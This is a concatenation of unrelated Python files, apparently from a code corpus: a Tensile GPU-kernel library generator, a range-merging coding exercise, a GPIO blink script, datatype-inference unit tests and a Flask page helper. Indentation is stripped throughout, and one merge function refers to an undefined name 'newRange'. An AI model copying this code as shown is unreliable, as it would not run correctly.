kernelFiles += buildKernelSourceAndHeaderFiles(results, outputPath, kernelsWithBuildErrs, kernelSourceFile, kernelHeaderFile)
kernelsToBuild = list(kernels)
if errorTolerant:
def success(kernel):
writer = kernelWriterAssembly if kernel['KernelLanguage'] == 'Assembly' else kernelWriterSource
kernelName = writer.getKernelName(kernel)
return kernelName not in kernelsWithBuildErrs
kernelsToBuild = list(filter(success, kernelsToBuild))
if False:#len(kernelsWithBuildErrs) > 0:
print("\nKernel compilation failed in one or more subprocesses. May want to set CpuThreads=0 and re-run to make debug easier")
printExit("** kernel compilation failure **")
# beta-only kernels
for kernel in kernelsBetaOnly:
kernelWriter = kernelWriterSource
kernelName = kernelWriter.getKernelNameBetaOnly(kernel)
# write kernel.cpp
if not globalParameters["MergeFiles"]:
kernelSourceFilename = os.path.join(outputPath, "Kernels", kernelName+".cpp")
kernelSourceFile = open(kernelSourceFilename, "w")
kernelSourceFile.write(CHeader)
kernelFiles.append(kernelSourceFilename)
(err, src) = kernelWriter.getSourceFileStringBetaOnly(kernel)
kernelSourceFile.write(src)
if err:
print("*** warning: invalid kernel#%u"%kernelName)
if not globalParameters["MergeFiles"]:
kernelSourceFile.close()
# write kernel.h
if not globalParameters["MergeFiles"]:
kernelHeaderFile = open(os.path.join(outputPath, "Kernels", kernelName + ".h"), "w")
kernelHeaderFile.write(CHeader)
kernelHeaderFile.write( kernelWriter.getHeaderFileStringBetaOnly(kernel))
if not globalParameters["MergeFiles"]:
kernelHeaderFile.close()
# close merged
if globalParameters["MergeFiles"]:
kernelSourceFile.close()
kernelHeaderFile.close()
kernelsToBuild += kernelsBetaOnly
codeObjectFiles += buildSourceCodeObjectFiles(CxxCompiler, kernelFiles, outputPath)
codeObjectFiles += getAssemblyCodeObjectFiles(kernelsToBuild, kernelWriterAssembly, outputPath)
stop = time.time()
print("# Kernel Building elapsed time = %.1f secs" % (stop-start))
print1("# Writing Solutions")
if globalParameters["ShowProgressBar"]:
progressBar = ProgressBar(len(solutions))
##############################################################################
# Write Solutions
##############################################################################
solutionSourceFilename = os.path.join(outputPath, "Solutions.cpp")
solutionHeaderFilename = os.path.join(outputPath, "Solutions.h")
solutionSourceFile = open(solutionSourceFilename, "w")
solutionHeaderFile = open(solutionHeaderFilename, "w")
solutionSourceFile.write(CHeader)
solutionHeaderFile.write(CHeader)
solutionSourceFile.write("#include \"Solutions.h\"\n")
solutionSourceFile.write("#include <algorithm>\n")
solutionHeaderFile.write("#include \"TensileTypes.h\"\n")
solutionHeaderFile.write("#include \"SolutionHelper.h\"\n")
solutionHeaderFile.write("#include \"Tools.h\"\n")
if globalParameters["CodeFromFiles"]:
solutionHeaderFile.write("#include <unistd.h>\n")
if globalParameters["MergeFiles"]:
solutionHeaderFile.write("#include \"Kernels.h\"\n")
# Write a solution pointer typedef for each problemType:
h = ""
for problemType in problemTypes:
#print "p=", problemType
argListAll = solutionWriter.getArgList(problemType, True, True, True, True)
# declare TensileSolutionPointer_ProblemType
h += "\n// solution pointer\n"
h += "typedef TensileStatus (*TensileSolutionPointer_%s)(\n" % problemType
for i in range(0, len(argListAll)):
h += " %s %s%s" % (argListAll[i][0], argListAll[i][1], ",\n" \
if i < len(argListAll)-1 else ");\n\n")
h += "\n"
solutionHeaderFile.write(h)
#
for solution in solutions:
# get solution name
if not globalParameters["MergeFiles"]:
solutionFileName = solutionWriter.getSolutionName(solution)
# write solution.cpp
if not globalParameters["MergeFiles"]:
solutionSourceFile = open(os.path.join(outputPath, \
"Solutions", solutionFileName+".cpp"), "w")
solutionSourceFile.write(CHeader)
solutionSourceFile.write( \
solutionWriter.getProblemSourceString(solution["ProblemType"], solution, kernelsWithBuildErrs))
if not globalParameters["MergeFiles"]:
solutionSourceFile.close()
# write solution.h
if not globalParameters["MergeFiles"]:
solutionHeaderFile = open(os.path.join(outputPath, \
"Solutions", solutionFileName+".h"), "w")
solutionHeaderFile.write(CHeader)
solutionHeaderFile.write( \
solutionWriter.getHeaderFileString(solution))
if not globalParameters["MergeFiles"]:
solutionHeaderFile.close()
if globalParameters["ShowProgressBar"]:
progressBar.increment()
# close merged
if not globalParameters["MergeFiles"]:
solutionHeaderFile.close()
if globalParameters["ExitAfterKernelGen"]:
printExit("** Exiting after kernel generation due to ExitAfterKernelGen=1")
return codeObjectFiles
################################################################################
# Write Logic
################################################################################
def writeLogic(outputPath, logicData, solutionWriter ):
print1("# Writing Library Logic")
if not globalParameters["MergeFiles"]:
ensurePath(os.path.join(outputPath, "Logic"))
# Tensile.h
h = ""
h += "#pragma once\n"
h += "#include \"TensileTypes.h\"\n"
h += "#include \"SolutionHelper.h\"\n"
h += "#include \"SolutionMapper.h\"\n"
# TensileInternal.h
ih = ""
ih += "#include \"Tensile.h\"\n"
# Tensile.cpp
sourceIncludes = ""
sourceIncludes += "#include \"Solutions.h\"\n"
sourceIncludes += "#include \"Tensile.h\"\n"
sourceIncludes += "#include \"TensileInternal.h\"\n"
sourceIncludes += "#include \"SolutionMapper.h\"\n"
s = sourceIncludes
########################################
# problemType
for problemType in logicData:
# function argument list
argListSizes = solutionWriter.getArgList(problemType, False, False, False, False)
argListData = solutionWriter.getArgList(problemType, False, True, True, True)
argListAll = solutionWriter.getArgList(problemType, True, True, True, True)
# tensile initializer
h += "\nvoid tensileInitialize();\n\n"
# declare tensile_ProblemType
h += "\n// enqueue solution\n"
h += "TensileStatus tensile_%s(\n" % problemType
for i in range(0, len(argListData)):
h += " %s %s%s" \
% (argListData[i][0], argListData[i][1], \
",\n" if i < len(argListData)-1 else ");\n\n")
numSizes = problemType["TotalIndices"];
firstStride = 0 if problemType["UseInitialStrides"] else 1
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
lastStrideC = problemType["NumIndicesC"]
lastStrideD = problemType["NumIndicesC"]
h += "typedef ProblemKey<%u> ProblemKey_%s;\n" % (numSizes,problemType)
h += "typedef ProblemDims<%u,%u,%u,%u,%u,%u> ProblemDims_%s;\n" \
% (firstStride, lastStrideD, lastStrideC, lastStrideA, lastStrideB, numSizes, problemType)
h += "typedef SolutionMapper<ProblemDims_%s, ProblemKey_%s> SolutionMapper_%s;\n" \
% (problemType, problemType, problemType)
# declare tensileGetSolutionPointer_ProblemType
h += "\n// get solution pointer\n"
h += "SolutionMapper_%s::SolutionRuntime *\n" % (problemType)
h += "tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
h += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ");\n\n")
# declare tensileName_
h += "// get solution name\n"
h += "const char * tensileGetSolutionName_%s(\n" \
% (problemType)
for i in range(0, len(argListSizes)):
h += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ");\n\n")
# get solution naming for problem type
solutionsForProblemType = []
for scheduleTuple in logicData[problemType]:
solutionsForSchedule = scheduleTuple[2]
for solution in solutionsForSchedule:
if solution not in solutionsForProblemType:
solutionsForProblemType.append(solution)
# solution names for problem type
solutionNamesForProblemType = []
for solution in solutionsForProblemType:
solutionName = solutionWriter.getSolutionName(solution)
solutionNamesForProblemType.append(solutionName)
# reset problemType source
if not globalParameters["MergeFiles"]:
filePrefix = "Tensile_%s" % (problemType)
s = sourceIncludes
for solutionName in solutionNamesForProblemType:
s += "#include \"%s.h\"\n" % solutionName
########################################
# Per-problem constants here:
# These are common for all schedules and thus do not include schedule name (vega,hip,etc)
s += "\n"
s += "/*******************************************************************************\n"
s += "* Per-Problem Functions for %s\n" % problemType
s += "*******************************************************************************/\n"
s += "// Problem type include the index assignments for free, summation, batch:\n"
s += "static const ProblemType problemType_%s( " % problemType
s += listToInitializer(problemType["IndicesFree"]) + ", "
s += listToInitializer(problemType["IndicesSummation"]) + ", "
s += listToInitializer(problemType["IndicesBatch"]) + ", "
s += listToInitializer(problemType["IndexAssignmentsA"]) + ", "
s += listToInitializer(problemType["IndexAssignmentsB"])
s += ");\n"
s += "\n"
s += "// Master solution mapper is the entry point for problem->solution mapping\n"
s += "// There is one master solution mapper per problem type\n"
s += "// The master solution mapper contains pointers to the solution mappers for each device\n"
s += "static MasterSolutionMapper<ProblemDims_%s> masterSolutionMapper_%s;\n " % (problemType,problemType)
########################################
# implement per-Schedule functions in source
s += "\n"
s += "/*******************************************************************************\n * Per-Schedule Functions\n *******************************************************************************/"
for scheduleTuple in logicData[problemType]:
# get logic parameters for problem type
scheduleName = scheduleTuple[0]
deviceNames = scheduleTuple[1]
solutionsForSchedule = scheduleTuple[2]
indexOrder = scheduleTuple[3]
exactLogic = scheduleTuple[4]
rangeLogic = scheduleTuple[5]
# solution names for schedule
solutionNamesForSchedule = []
for solution in solutionsForSchedule:
solutionName = solutionWriter.getSolutionName(solution)
solutionNamesForSchedule.append(solutionName)
s += "\n\n"
schedProbName = "%s_%s" % (scheduleName, problemType)
s += writeSolutionAndExactTable(scheduleName, deviceNames, schedProbName, problemType, \
solutionsForSchedule, solutionNamesForSchedule, exactLogic)
# Per-problem function here:
# function tensileGetSolutionPointer_ProblemType
del schedProbName
del scheduleName
s += "\n// problem dims -> solution logic\n"
s += "SolutionMapper_%s::SolutionRuntime *\n" % (problemType)
s += "tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
s += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ") {\n\n")
exactLogicStr = writeExactLogic(problemType, indexOrder, \
solutionsForSchedule, exactLogic, \
solutionNamesForSchedule, True)
if rangeLogic != None:
print("** warning: ignored ranges in logic file, these should have been expanded with ExpandRanges=1 during Tensile phase 3")
s += " /* exact mappings */\n"
s += exactLogicStr
s += "\n return nullptr;\n"
s += "\n}\n"
# function tensileGetSolutionName_Schedule_ProblemType
s += "\n// get solution name for problem dims\n"
s += "const char * tensileGetSolutionName_%s(\n" \
% (problemType)
for i in range(0, len(argListSizes)):
s += " %s %s%s" \
% (argListSizes[i][0], argListSizes[i][1], \
",\n" if i < len(argListSizes)-1 else ") {\n\n")
exactLogicStr = writeExactLogic(problemType, indexOrder, \
solutionsForSchedule, exactLogic, \
solutionNamesForSchedule, False)
s += " /* exact mappings */\n"
s += exactLogicStr
#s += " return NULL; // none\n"
s += "\n}\n"
########################################
# implement problem-type functions in source
s += "/*******************************************************************************\n * Per-ProblemType Functions\n *******************************************************************************/"
# declare tensile_ProblemType
s += "\n// main call to solution; enqueues a kernel\n"
s += "TensileStatus tensile_%s(\n" % problemType
for i in range(0, len(argListData)):
s += " %s %s%s" \
% (argListData[i][0], argListData[i][1], \
",\n" if i < len(argListData)-1 else ") {\n")
s += " auto solution = tensileGetSolutionPointer_%s(\n" % (problemType)
for i in range(0, len(argListSizes)):
s += " %s%s" \
% (argListSizes[i][1], ", " if i < len(argListSizes)-1 else ");")
s += "\n"
s += " if (solution) {\n"
s += " TensileSolutionPointer_%s f = reinterpret_cast<TensileSolutionPointer_%s> (solution->_info->_functionPtr);\n" \
% (problemType, problemType)
s += " auto solutionLock = &solution->_lock;\n"
s += " return f("
for i in range(0, len(argListAll)):
s += "%s%s" \
% (argListAll[i][1], ", " if i < len(argListAll)-1 else ");\n")
s += " } else {\n"
#s += " printf(\"solution not valid, returning fail\\n\");"
s += " return tensileStatusFailure; // no solution found\n"
s += " }\n"
s += "}\n"
# open and close problemType files
if not globalParameters["MergeFiles"]:
logicSourceFile = open(os.path.join(outputPath, "Logic", \
"%s.cpp" % filePrefix), "w")
logicSourceFile.write(s)
logicSourceFile.close()
s += "\n"
s += writeTensileInitialize(logicData)
# close merged files
if globalParameters["MergeFiles"]:
logicSourceFile = open(os.path.join(outputPath, \
"Tensile.cpp"), "w")
logicSourceFile.write(s)
logicSourceFile.close()
logicHeaderFile = open(os.path.join(outputPath, \
"Tensile.h"), "w")
logicHeaderFile.write(h)
logicHeaderFile.close()
internalHeaderFile = open(os.path.join(outputPath, \
"TensileInternal.h"), "w")
internalHeaderFile.write(ih)
internalHeaderFile.close()
def writeTensileInitialize(logicData):
s = "/*******************************************************************************\n"
s += "* Tensilze initializer\n"
s += "*******************************************************************************/\n"
s += "void tensileInitialize() {\n"
for problemType in logicData:
s += " masterSolutionMapper_%s.initialize();\n" % problemType
for scheduleTuple in logicData[problemType]:
scheduleName = scheduleTuple[0]
deviceNames = scheduleTuple[1]
schedProbName = "%s_%s" % (scheduleName, problemType)
s += " solutionMapper_%s.initializeMappers(" % (schedProbName)
s += "{%s}," % (', '.join('"{0}"'.format(w) for w in deviceNames))
s += "&masterSolutionMapper_%s);\n" % (problemType)
s += "}"
return s
def writeSolutionAndExactTable(scheduleName, deviceNames, schedProbName, problemType, \
solutionsForSchedule, solutionNames, exactLogic):
s = ""
s += "namespace { // Start schedule '%s'\n" % scheduleName
s += "// solution table - function, name, assertion requirements\n"
s += "static const SolutionInfo solutionTable_%s[] = {\n" % (schedProbName)
for i in range(0, len(solutionsForSchedule)):
solution = solutionsForSchedule[i]
solutionName = solutionNames[i]
s += " {(void*)%s, \"%s\", {%d, %d, %d, %d, %d, %d, %d} }%s // %d" % \
(solutionName, solutionName, \
solution["AssertSummationElementMultiple"], \
solution["AssertFree0ElementMultiple"], \
solution["AssertFree1ElementMultiple"], \
solution["AssertMinApproxSize"], \
solution["LdcEqualsLdd"], \
solution["PackBatchDims"]==2, \
solution["PackBatchDims"]==1, \
"," if i < len(solutionsForSchedule)-1 else "", \
i)
s += "\n"
s += "};\n\n"
# Write the exact problems here
s += "// table of exact problem dims and selected solutionIdx\n"
s += "static const std::pair<const ProblemKey_%s, int> embeddedExactTable_%s[] = {\n" % (problemType,schedProbName)
numSizes = problemType["TotalIndices"]
for ruleIdx in range(0, len(exactLogic)):
rule = exactLogic[ruleIdx]
problemSize = rule[0][:numSizes]
solutionIdx = rule[1][0]
solutionGFlops = rule[1][1]
s += " { {"
for i in range(0, len(problemSize)):
if i == 0:
s += "%u" % problemSize[i];
else:
s += ", %u" % problemSize[i];
s += "}, %u}" % (solutionIdx)
s += "," if ruleIdx != len(exactLogic)-1 else " "
s += " // %.0f GFlop/s" % (solutionGFlops)
s += "\n";
s += "};\n\n"
# Create a solution mapper and init with the table above:
s += "// The solution master constructor here adds device to the master solution mapper\n"
s += "// The entrypoint to find a solution for this problem is through the master solution master\n"
s += "static SolutionMapper_%s solutionMapper_%s(\n" % (problemType, schedProbName)
s += " \"%s\", // schedule+problem name\n" % (schedProbName)
s += " solutionTable_%s, %u,\n" % (schedProbName, len(solutionsForSchedule))
s += " embeddedExactTable_%s, %u,\n" % (schedProbName, len(exactLogic))
s += " &problemType_%s);\n" % (problemType)
s += "} // end anonymous namespace\n"
return s
################################################################################
# Write Range Logic Recursive
# ptr :
# True : write logic to return the function pointer
# False : write logic to return the function name
################################################################################
def writeExactLogic(problemType, indexOrder,
solutionsForSchedule, exactLogic, \
solutionNames, ptr):
s = ""
s += " ProblemDims_%s pdims(" % problemType
indexChars = globalParameters["IndexChars"]
firstStride = 0 if problemType["UseInitialStrides"] else 1
lastStrideD = problemType["NumIndicesC"]
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
for i in range(firstStride,lastStrideD):
if i != firstStride: s += ", "
s += "strideD%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideC):
s += ", strideC%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
s += ", strideA%u%s" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
s += ", strideB%u%s" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0,len(indexOrder)):
s += ", size%s" % indexChars[i]
s += ");\n"
s += " auto solutionMapper = reinterpret_cast<SolutionMapper_%s *> (masterSolutionMapper_%s.mapper());\n" \
% (problemType, problemType)
if ptr:
s += " return solutionMapper->getSolutionWithFallback(pdims,&masterSolutionMapper_%s);\n" % problemType
else:
s += " return solutionMapper->getSolutionWithFallback(pdims,&masterSolutionMapper_%s)->_info->_name;\n" % problemType
return s
################################################################################
# Write Solution Call
################################################################################
def writeSolutionCall(solutionName, problemType):
indexChars = globalParameters["IndexChars"]
s = ""
s += "%s(" % solutionName
# solution parameters
s += " dataD, dataC, dataA, dataB, alpha"
if problemType["UseBeta"]:
s += ", beta"
s += ", offsetC, offsetA, offsetB"
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideD = problemType["NumIndicesC"]
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
for i in range(firstStride,lastStrideD):
s += ", strideD%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideC):
s += ", strideC%u%s" % (i, indexChars[i])
for i in range(firstStride,lastStrideA):
s += ", strideA%u%s" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for i in range(firstStride,lastStrideB):
s += ", strideB%u%s" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for i in range(0, problemType["TotalIndices"]):
s += ", size%s" % indexChars[i]
s += ", stream, numInputEvents, inputEvents, outputEvent )"
return s
################################################################################
# Write CMake
################################################################################
def writeCMake(outputPath, solutions, kernels, libraryStaticFiles, clientName ):
print1("# Writing Custom CMake")
##############################################################################
# Min Naming
##############################################################################
if globalParameters["ShortNames"] and not globalParameters["MergeFiles"] :
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
else:
solutionSerialNaming = None
kernelSerialNaming = None
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
kernelWriterSource = KernelWriterSource( \
kernelMinNaming, kernelSerialNaming)
kernelWriterAssembly = KernelWriterAssembly( \
kernelMinNaming, kernelSerialNaming)
generatedFile = open(os.path.join(outputPath, "Generated.cmake"), "w")
generatedFile.write(CMakeHeader)
generatedFile.write("set( TensileClient_SOLUTIONS\n")
# write solution names
if globalParameters["MergeFiles"]:
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions.h\n")
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions.cpp\n")
else:
for solution in solutions:
solutionName = solutionWriter.getSolutionName(solution)
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions/%s.h\n" \
% (solutionName) )
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Solutions/%s.cpp\n" \
% (solutionName) )
generatedFile.write(" )\n")
# write kernel names
generatedFile.write("set( TensileClient_KERNELS\n")
if globalParameters["MergeFiles"]:
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels.h\n")
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels.cpp\n")
else:
for kernel in kernels:
kernelName = kernelWriterSource.getKernelName(kernel) if kernel["KernelLanguage"] == "Source" else kernelWriterAssembly.getKernelName(kernel)
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels/%s.h\n" % (kernelName))
generatedFile.write(" ${CMAKE_SOURCE_DIR}/Kernels/%s.cpp\n" % kernelName)
generatedFile.write(" )\n")
generatedFile.write("set( TensileClient_SOURCE\n")
for fileName in libraryStaticFiles:
# copy file
shutil.copy( os.path.join(globalParameters["SourcePath"], fileName), \
outputPath )
# add file to cmake
generatedFile.write(" ${CMAKE_SOURCE_DIR}/%s\n" % fileName)
generatedFile.write(" )\n\n")
# close generated cmake
generatedFile.close()
################################################################################
# Tensile Create Library
################################################################################
def TensileCreateLibrary():
print1("")
print1(HR)
print1("# Tensile Create Library")
print2(HR)
print2("")
##############################################################################
# Parse Command Line Arguments
##############################################################################
print2("Arguments: %s" % sys.argv)
argParser = argparse.ArgumentParser()
argParser.add_argument("LogicPath", help="Path to LibraryLogic.yaml files.")
argParser.add_argument("OutputPath", help="Where to write library files?")
argParser.add_argument("RuntimeLanguage", help="Which runtime language?", choices=["OCL", "HIP", "HSA"])
argParser.add_argument("--cxx-compiler", dest="CxxCompiler", choices=["hcc", "hipcc"], action="store", default="hcc")
argParser.add_argument("--code-object-version", dest="CodeObjectVersion", choices=["V2", "V3"], action="store", default="V2")
argParser.add_argument("--merge-files", dest="MergeFiles", action="store_true")
argParser.add_argument("--no-merge-files", dest="MergeFiles", action="store_false")
argParser.add_argument("--short-file-names", dest="ShortNames", action="store_true")
argParser.add_argument("--no-short-file-names", dest="ShortNames", action="store_false")
argParser.add_argument("--library-print-debug", dest="LibraryPrintDebug", action="store_true")
argParser.add_argument("--no-library-print-debug", dest="LibraryPrintDebug", action="store_false")
argParser.add_argument("--embed-library", dest="EmbedLibrary",
help="Embed (new) library files into static variables. Specify the name of the library.")
argParser.add_argument("--embed-library-key", dest="EmbedLibraryKey", default=None,
help="Access key for embedding library files.")
args = argParser.parse_args()
logicPath = args.LogicPath
outputPath = args.OutputPath
CxxCompiler = args.CxxCompiler
print2("OutputPath: %s" % outputPath)
ensurePath(outputPath)
arguments = {}
arguments["RuntimeLanguage"] = args.RuntimeLanguage
arguments["CodeObjectVersion"] = args.CodeObjectVersion
arguments["CxxCompiler"] = args.CxxCompiler
arguments["MergeFiles"] = args.MergeFiles
arguments["ShortNames"] = args.ShortNames
arguments["LibraryPrintDebug"] = args.LibraryPrintDebug
arguments["CodeFromFiles"] = False
arguments["EmbedLibrary"] = args.EmbedLibrary
assignGlobalParameters(arguments)
print1("# CodeObjectVersion from TensileCreateLibrary: %s" % arguments["CodeObjectVersion"])
print1("# CxxCompiler from TensileCreateLibrary: %s" % CxxCompiler)
if not os.path.exists(logicPath):
printExit("LogicPath %s doesn't exist" % logicPath)
logicFiles = [os.path.join(logicPath, f) for f in os.listdir(logicPath) \
if (os.path.isfile(os.path.join(logicPath, f)) \
and os.path.splitext(f)[1]==".yaml")]
print1("# LibraryLogicFiles:" % logicFiles)
for logicFile in logicFiles:
print1("# %s" % logicFile)
##############################################################################
# Parse config files
##############################################################################
solutions = []
logicData = {} # keys are problemTypes, values are schedules
newMasterLibrary = None
libraries = Common.ParallelMap(YAMLIO.readLibraryLogicForSchedule, logicFiles, "Reading logic files")
for logic in Utils.tqdm(libraries, "Processing logic data"):
(scheduleName, deviceNames, problemType, solutionsForSchedule, \
indexOrder, exactLogic, rangeLogic, newLibrary) = logic
if problemType not in logicData:
logicData[problemType] = []
logicData[problemType].append((scheduleName, deviceNames, \
solutionsForSchedule, indexOrder, exactLogic, rangeLogic ))
for solution in solutionsForSchedule:
if solution not in solutions:
solutions.append(solution)
if newMasterLibrary is None:
newMasterLibrary = newLibrary
else:
newMasterLibrary.merge(newLibrary)
# create solution writer and kernel writer
kernels = []
kernelsBetaOnly = []
for solution in solutions:
solutionKernels = solution.getKernels()
for kernel in solutionKernels:
if kernel not in kernels:
kernels.append(kernel)
solutionKernelsBetaOnly = solution.getKernelsBetaOnly()
for kernel in solutionKernelsBetaOnly:
if kernel not in kernelsBetaOnly:
kernelsBetaOnly.append(kernel)
# if any kernels are assembly, append every ISA supported
if globalParameters["ShortNames"] and not globalParameters["MergeFiles"]:
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
else:
solutionSerialNaming = None
kernelSerialNaming = None
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
kernelWriterSource = KernelWriterSource( \
kernelMinNaming, kernelSerialNaming)
kernelWriterAssembly = KernelWriterAssembly( \
kernelMinNaming, kernelSerialNaming)
libraryStaticFiles = [
"SolutionMapper.h",
"TensileTypes.h",
"tensile_bfloat16.h",
"KernelHeader.h",
"SolutionHelper.cpp",
"SolutionHelper.h",
"Tools.cpp",
"Tools.h" ]
# write cmake
clientName = "LibraryClient"
writeCMake(outputPath, solutions, kernels, libraryStaticFiles, clientName )
# write solutions and kernels
problemTypes = list(logicData.keys())
codeObjectFiles = writeSolutionsAndKernels(outputPath, CxxCompiler, problemTypes, solutions,
kernels, kernelsBetaOnly,
solutionWriter,
kernelWriterSource, kernelWriterAssembly)
# write logic
writeLogic(outputPath, logicData, solutionWriter)
newLibraryDir = ensurePath(os.path.join(outputPath, 'library'))
masterFile = os.path.join(newLibraryDir, "TensileLibrary.yaml")
newMasterLibrary.applyNaming(kernelMinNaming)
YAMLIO.write(masterFile, Utils.state(newMasterLibrary))
if args.EmbedLibrary is not None:
embedFileName = os.path.join(outputPath, "library/{}.cpp".format(args.EmbedLibrary))
with EmbeddedData.EmbeddedDataFile(embedFileName) as embedFile:
embedFile.embed_file(newMasterLibrary.cpp_base_class, masterFile, nullTerminated=True,
key=args.EmbedLibraryKey)
for co in Utils.tqdm(codeObjectFiles):
embedFile.embed_file("SolutionAdapter", co, nullTerminated=False,
key=args.EmbedLibraryKey)
print1("# Tensile Library Writer DONE")
print1(HR)
print1("")
| StarcoderdataPython |
4818722 | <reponame>hoaiphun96/Leet-Code-Problems
"""
Given a sorted list of integer ranges (see Range in Use Me) and a new range as inputs, insert the new range at the correct position and merge all overlapping ranges.
Note: Check out the Use Me section to get the structure of the Range class.
Example:
Input : [[1,10], [5,8], [8,15]]
New range : [9,20]
Output : [[1,20]]
"""
#Approach 1:
def insert_and_merge(input_range_list, new_range):
position = find_insert_position(input_range_list, new_range)
if position == len(input_range_list):
input_range_list.append(new_range)
else:
input_range_list = input_range_list[:position] + [new_range] + input_range_list[position:]
return merge_ranges(input_range_list)
def find_insert_position(input_range_list, new_range):
left, right = 0, len(input_range_list) - 1
while left <= right:
middle = (left + right) // 2
if input_range_list[middle].lower_bound > new_range.lower_bound:
right = middle - 1
elif input_range_list[middle].lower_bound < new_range.lower_bound:
left = middle + 1
else:
return middle + 1
return left
def merge_ranges(input_range_list):
ret = [input_range_list[0]]
for index in range(1, len(input_range_list)):
if input_range_list[index].lower_bound <= ret[-1].upper_bound:
ret[-1].upper_bound = max(ret[-1].upper_bound, input_range_list[index].upper_bound)
else:
ret.append(input_range_list[index])
return ret
#Approach 2
def insert_and_merge(input_range_list, new_range):
# Insert Range
insert_list = []
for range in input_range_list:
if range.upper_bound < new_range.lower_bound:
insert_list.append(range)
else:
if range.lower_bound > new_range.upper_bound:
insert_list.append(new_range)
new_range = range
else:
if range.upper_bound >= new_range.lower_bound or range.lower_bound <= newRange.upper_bound:
new_range = Range(min(range.lower_bound, new_range.lower_bound),
max(new_range.upper_bound, range.upper_bound))
insert_list.append(new_range)
# Merge ranges
output_list = []
previous = insert_list[0]
i = 1
while i < len(insert_list):
current = insert_list[i]
if (previous.upper_bound >= current.lower_bound):
merged = Range(previous.lower_bound, max(previous.upper_bound, current.upper_bound));
previous = merged
else:
output_list.append(previous)
previous = current
i = i + 1
output_list.append(previous)
return output_list
| StarcoderdataPython |
172369 | <reponame>FelixWeichselgartner/PiHeld
# https://github.com/fidoriel/pyMCP23017
import pyMCP23017
from time import sleep
mcp = pyMCP23017.MCP23017(0x20)
pin=7
mcp.setup(pin, mcp.OUT)
pin2=8
mcp.setup(pin2, mcp.OUT)
while 1:
sleep(1)
mcp.output(pin, mcp.HIGH)
mcp.output(pin2, mcp.LOW)
sleep(1)
mcp.output(pin2, mcp.HIGH)
mcp.output(pin, mcp.LOW)
| StarcoderdataPython |
4812083 | <reponame>bobosoft/intrepyd
import unittest
from intrepyd.iec611312py.expression import ConstantOcc, VariableOcc
from intrepyd.iec611312py.variable import Variable
from intrepyd.iec611312py.datatype import Primitive
from intrepyd.iec611312py.expression import Expression
from intrepyd.iec611312py.inferdatatype import InferDatatypeBottomUp, InferDatatypeTopDown
from intrepyd.iec611312py.statement import Assignment
boolType = Primitive('BOOL')
intType = Primitive('INT')
class TestSTInferDatatype(unittest.TestCase):
def test_eq_1(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
eq = Expression('=', [var, cst])
idbu = InferDatatypeBottomUp()
idbu.process_statements([eq])
self.assertEqual(eq.datatype, boolType)
idtd = InferDatatypeTopDown()
idtd.process_statements([eq])
self.assertEqual(cst.datatype, intType)
def test_eq_2(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
plus = Expression('+', [var, cst])
idbu = InferDatatypeBottomUp()
idbu.process_statements([plus])
self.assertEqual(plus.datatype, intType)
idtd = InferDatatypeTopDown()
idtd.process_statements([plus])
self.assertEqual(cst.datatype, intType)
def test_eq_3(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
assign = Assignment(var, cst)
idbu = InferDatatypeBottomUp()
idbu.process_statements([assign])
idtd = InferDatatypeTopDown()
idtd.process_statements([assign])
self.assertEqual(cst.datatype, intType)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3208313 | <filename>application.py
import sys
import click
import os
import glob
from flask import Flask, Markup, Response, render_template, render_template_string, send_from_directory, current_app, safe_join
from flask_flatpages import FlatPages, pygmented_markdown, pygments_style_defs
from flask_frozen import Freezer
app = Flask(__name__)
app.config.from_object('settings')
pages = FlatPages(app)
freezer = Freezer(app=app, log_url_for=True, with_static_files=True)
def get_pages(**kwargs):
"""
Convenience function to get one or more pages by one or more of its
metadata items.
"""
pass
def get_pages_by_slug(slug):
for p in pages:
if p.meta.get('slug', None) == slug:
return p
def get_pages_by_tags(*args):
tag_set = set(args)
pages_ = (p for p in pages if tag_set & set(p.meta.get('tags','')))
return sorted(pages_, reverse=True, key=lambda p: p.meta['date'])
